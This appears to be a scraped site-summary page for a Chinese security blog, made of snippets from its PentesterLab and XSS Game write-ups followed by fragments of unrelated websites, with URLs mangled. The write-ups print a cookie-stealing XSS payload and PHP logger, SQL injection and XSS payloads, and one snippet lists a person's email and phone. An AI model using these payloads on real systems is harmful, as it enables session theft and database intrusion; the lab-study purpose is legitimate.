old.blog.lightrains.org
西风微雨的旧博客旧博客,杂事纪录本
http://old.blog.lightrains.org/
旧博客,杂事纪录本
http://old.blog.lightrains.org/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Friday
LOAD TIME
1.5 seconds
PAGES IN
THIS WEBSITE
19
SSL
EXTERNAL LINKS
10
SITE IP
119.29.253.228
LOAD TIME
1.453 sec
SCORE
6.2
西风微雨的旧博客 | old.blog.lightrains.org Reviews
https://old.blog.lightrains.org
旧博客,杂事纪录本
old.blog.lightrains.org
分类 网络安全 下的文章 - 西风微雨的旧博客
https://old.blog.lightrains.org/category/security
PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Http:/ 192.168.56.101/sqli/example1.php? Name=root' union select user(),version(),@ basedir,4,5%23. 过滤空格,换行符%0a绕过, 0b也可以,http:/ 192.168.56.101/sqli/example2.php? Name=hacker script alert(1) /script.
西风微雨的旧博客
https://old.blog.lightrains.org/page/3
Coding Exploits Curious Sharing. 享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap. 漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术. Keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则. Mysql use test; Database changed; mysql select * from user; - - - - - - - - - - - - id name password - - - - - - - - - - - - 1 admin admin 2 zephyrus zephyrus - - - - - - - - - - - - 2 rows in set (0.00 sec). Php $conn=mysql connect(localhost, root, ); if (! 这里就参照@瞌睡龙菊苣的总结 http:/ drops.wooyun.org/tips/123. 假 表示查询是错误的 (MySQL 报错/返回页面与原来不同).
标签 php 下的文章 - 西风微雨的旧博客
https://old.blog.lightrains.org/tag/php
After reading 'PHP Object Injection'. The original link http:/ securitycafe.ro/2015/01/05/understanding-php-object-injection/. Php object injection主要是由于PHP中的magic方法序列化引起,例如 construct()、 toString()、 destruct(). 例如 echo $obj; 应该显示些什么。 此方法必须返回一个字符串,否则将发出一条 E RECOVERABLE ERROR 级别的致命错误. 关于PHP中magic方法这里不再详细叙述,详细参照 http:/ php.net/manual/zh/language.oop5.php. The Blog zephyrus.log is an awesome blog. O:4:Blog:2:{s:4:name;s:12:zephyrus.log;s:3:adj;s:7:awesome;}. The Blog zephyrus.log is an awesome blog. Php $a='2...
[pentesterLab]XSS and MySQL FILE - 西风微雨的旧博客
https://old.blog.lightrains.org/write/xss-and-mysql-file.html
Raquo; [pentesterLab]XSS and MySQL FILE. PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? 访问http:/ 192.168.56.101/admin即可进入后台管理. 在文章edit区域发现注入,http:/ 192.168.56.101/admin/edit.php? Http:/ 192.168.56.101/admin/edit.php? Id=0 union select 1,user(),3,4#. PentesterLab]web for pentester I.
西风微雨的旧博客
https://old.blog.lightrains.org/page/1
Coding Exploits Curious Sharing. 享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap. 漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术. Keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则. PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Name=hacker script alert(1) /script.
TOTAL PAGES IN THIS WEBSITE
19
e107 CMS <=2.1.2 权限提升漏洞分析
https://lightrains.org/e107-cms-privilege-escalation
You are being watched. 8226; Tag: Vuls Analysis. E107 CMS =2.1.2 权限提升漏洞分析. 原文链接: http:/ bobao.360.cn/learning/detail/3368.html. Version =2.1.2. 运行环境:macOS10.12.2 apache2.4.23 PHP5.6.27 Mysql5.7.16. E107 CMS版本 v2.1.2. 首先我们从rips的扫描报告 https:/ blog.ripstech.com/2016/e107-sql-injection-through-object-injection/中可以大致知道整个漏洞的触发. 变量关系注释 $ POST[‘updated data’]为base64编码的值,$new data是base64解码后的值是一个序列化的值,$changedUserData为反序列化后的值,是一个数组。 E107 handlers/mysql class.php. 1087 $ftype = isset($fieldTypes[$fn])? FieldTypes[$f...
Vuls Analysis - Page 1 - 西风微雨(Wester's blog)
https://lightrains.org/tag/vuls-analysis
You are being watched. E107 CMS =2.1.2 权限提升漏洞分析. 原文链接: http:/ bobao.360.cn/learning/detail/3368.html 0x00.漏洞背景 e107 CMS是一个基于PHP、Bootstrap、Mysql的网站内容管理系统,可广泛用于个人博客、企业建站,在全球范围内使用较为广泛。 0x01漏洞影响版本 version =2.1.2 0x02.漏洞分析环境 运行环境:macOS10.12.2 apache2.4.23 PHP5.6.27 Mysql5.7.16 e107 CMS版本 v2.1…. 8226; Vuls Analysis. Roundcube v1.2.2命令执行漏洞分析. 本文翻译自https:/ blog.ripstech.com/2016/roundcube-command-execution-via-email/ ,有部分删改。 8226; Vuls Analysis. 8226; Vuls Analysis. Wester 2017,Host on qcloud.
About me
https://lightrains.org/about-me
You are being watched. Work at Tencent security platform department. This site is using Attribution-NonCommercial-ShareAlike 4.0 International Protocol. Wester 2017,Host on qcloud. This theme is based on vno theme. You can find source code at GitHub. My old blog old.blog.lightrains.org.
Threat books - 西风微雨(Wester's blog)
https://lightrains.org/tag/threat-books
You are being watched. 8226; Threat books. This site is using Attribution-NonCommercial-ShareAlike 4.0 International Protocol. Wester 2017,Host on qcloud. This theme is based on vno theme. You can find source code at GitHub. My old blog old.blog.lightrains.org.
Google XSS Game
https://lightrains.org/google-xss-game
You are being watched. 8226; Tag: XSS. Challenge Address: https:/ xss-game.appspot.com. Title:Hello, world of XSS. Https:/ xss-game.appspot.com/level1/frame? Query= img src=1 onerror=alert(1). Fill this payload in textarea:. Https:/ xss-game.appspot.com/level3/frame#3' onmouseover=alert(1). We should delete the suffix. And as we all know,brower will ignore the 2nd src attribute. Https:/ xss-game.appspot.com/level3/frame#3' onmouseover=alert(1) src=cloud1. Attribute will be added in the.
小议威胁情报feed
https://lightrains.org/threat-intelligence
You are being watched. 8226; Tag: Threat books. Http:/ init.icloud-analysis.com. Http:/ init.crash-analytics.com. Http:/ init.icloud-diagnostics.com. 姓名 Wang Long 邮箱 778560441@qq.com 手机 13276422520 地点 山东,济南. Https:/ www.sec-un.org/watcherlab-threat-intelligence-feed-please-feel-free-to-try.html. Https:/ www.sec-un.org/threat-intelligence-data-analysis-ip-feed.html. Scan qrcode,share this post. Roundcube v1.2.2命令执行漏洞分析. 8226; Tag: Vuls Analysis. 8226; Tag: XSS. Comments powered by Disqus.
西风微雨(Wester's blog) - Page 2
https://lightrains.org/page/2
You are being watched. Challenge Address:https:/ xss-game.appspot.com Level 1 Title:Hello, world of XSS payload: https:/ xss-game.appspot.com/level1/frame? Query= img src=1 onerror=alert(1) Level 2 Title:Persistence is key Fill this payload in textarea: i…. 8226; Tag: XSS. From Wechall to Re-recognize 'Extractvalue()'. Problem Description: When you visit this link you receive a message. Submit the same message back to https:/ www.wechall.net/challenge/training/programming1/index.php?
Roundcube v1.2.2命令执行漏洞分析
https://lightrains.org/roundcube-remote-command-execution
You are being watched. 8226; Tag: Vuls Analysis. Roundcube v1.2.2命令执行漏洞分析. 本文翻译自 https:/ blog.ripstech.com/2016/roundcube-command-execution-via-email/. 在这篇文章中,我们将会分析恶意用户如何通过Roundcube 1.2.2 = 1.0 发送一封电子邮件就可在远程操作系统上执行任意命令。 上述代码分析结果可以在我们的在线demo程序中获得 https:/ demo.ripstech.com/project/10/. 在Roundcube 1.2.2及更早版本中,用户可控的输入变量没有经过安全检查就传递到了PHP内置的高风险函数. 104 else if ($from string = rcmail email input format($from) { 105 if (preg match(‘/( S @ S )/‘, $from string, $m) 106 $from = trim($m1, ‘. 865 $result[] = $item; 86...
XSS - 西风微雨(Wester's blog)
https://lightrains.org/tag/xss
You are being watched. Challenge Address:https:/ xss-game.appspot.com Level 1 Title:Hello, world of XSS payload: https:/ xss-game.appspot.com/level1/frame? Query= img src=1 onerror=alert(1) Level 2 Title:Persistence is key Fill this payload in textarea: i…. This site is using Attribution-NonCommercial-ShareAlike 4.0 International Protocol. Wester 2017,Host on qcloud. This theme is based on vno theme. You can find source code at GitHub. My old blog old.blog.lightrains.org.
TOTAL LINKS TO THIS WEBSITE
10
Рами Блект: Персональный сайт
Рассылка Рами, октябрь 2012. Надеюсь, что у вас жизнь становится все лучше и лучше во всех отношениях. А для того, чтобы это случилось предлагаю вам одно средство, которое я достаточно научно проверил. По крайней мере, все кто следовал этому - их жизнь резко улучшилась во всех отношениях. Давайте будем писать два предложения в день:. 1 С каждым днем моя жизнь становится все лучше и лучше во всех отношениях. Спасибо Богу! Читать весь текст ». Подкаст-интервью, посвященный понятию свободы. Audio:http:/ old...
Bledzew - Najnowsze wydarzenia
Weronika, Bogumiła, Izydor. Struktura Urzędu Gminy Bledzew. Referat i samodzielne stanowiska Urzędu Gminy Bledzew - zakres czynności. Punkt Selektywnej Zbiórki Odpadów Komunalnych. Bledzew na starej fotografii. Herb i flaga gminy. Szkoła Podstawowa w Bledzewie. Szkoła Podstawowa w Templewie. Punkt Przedszkolny w Nowej Wsi. Przedszkole Gminne w Bledzewie. Kultura, rozrywka, sport, zabawa i inne. Gmina Bledzew z lotu ptaka. Zespoły śpiewacze i taneczne. Europejski Tydzień Sportu - sprawozdanie. Wydanie map...
blefjellsykehus.no - This domain may be for sale!
Find the best information and most relevant links on all topics related to blefjellsykehus.no. This domain may be for sale!
blissmo - blissmo, eco-friendly products
To receive exceptional organic and eco-friendly products each month right at your doorstep. Middot; blissmobox.com. Exceptional organic and eco products. Safer and better than conventional alternatives. Enter your email to start:. Higher design and quality lower toxicity and impact better for you and your family. Skip to: today's saver. Previously featured brands include:.
西风微雨的旧博客
Coding Exploits Curious Sharing. 享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap. 漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术. Keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则. PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Name=hacker script alert(1) /script.
게임 깎는 김노인
지금은 더 이상 업데이트 되지 않는 블로그. 문의: wjkim@neoocean.net. 전자책 ‘신’ 유감. 52280;고: http:/ gdf.inven.co.kr/viewtopic.php? Wjkim@neoocean.net / Ashley theme by Jxnblk.
Phusion Blog -
Traveling Ruby 20150210: smaller, supports Ruby 2.2, Windows. By Hongli Lai on. February 9th, 2015. Allows you to create self-contained, “portable” Ruby binaries which can run on any Windows machine, any Linux distribution and any OS X machine. This allows Ruby app developers to distribute a single package to end users, without needing end users to first install Ruby or gems. There’s a little bit of a backstory behind this release. Last week I went to Amsterdam.rb’s MRI Implementors Panel. Although some ...
MIGHTY EGGROLL! Productions
Apache2 Ubuntu Default Page: It works
Apache2 Ubuntu Default Page. This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file. Before continuing to operate your HTTP server. Package was installed on this server. Is always included from the main...
Bloomsbury Central Baptist Church
At the top of Shaftesbury Avenue in London's West End, Bloomsbury Central Baptist Church is a community of Christians who have been serving the local community and the wider world since 1848. Our doors are open every day of the week and visitors are warmly welcome to our services of worship, music concerts, lunches and talks or if they want to walk off the busy streets into a friendly place where they can meet others, pray or simply find quiet. Please bear with us during our transformation! Bloomsbury ...
